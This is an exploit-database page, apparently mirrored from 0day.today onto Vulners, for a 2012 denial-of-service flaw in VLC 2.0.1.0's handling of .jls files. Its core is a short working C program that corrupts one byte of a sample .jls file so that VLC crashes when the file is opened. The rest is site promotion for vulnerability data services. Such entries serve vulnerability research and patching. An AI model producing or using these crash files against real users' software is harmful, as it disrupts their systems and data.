Lucene search
K

VLC v. 2.0.1.0 .jls DOS

🗓️ 19 Mar 2012 00:00:00Reported by Dan FoscoType 
zdt
 zdt
🔗 0day.today👁 18 Views

VLC 2.0.1.0 .jls DOS vulnerability in Windows XP SP3 (64-bit

Code
# Exploit Title: VLC v. 2.0.1.0 .jls DOS
# Date: 3/18/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 2.0.1.0
# Category: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a

Tested on stable 2.0, 1.1.11, 2.0.1.0 (newest release as of 3/15/2012)

#include <stdio.h>

int main(int argc, char *argv[])
{
	FILE *f;
	f = fopen(argv[1], "r+");

	fseek(f, 7, SEEK_SET);
	fputc('\xff', f);

	fclose(f);
	return 0;
}

//code updates .jls file, can find samples on videolan ftp server



#  0day.today [2018-04-11]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Mar 2012 00:00Current
7High risk
Vulners AI Score7
18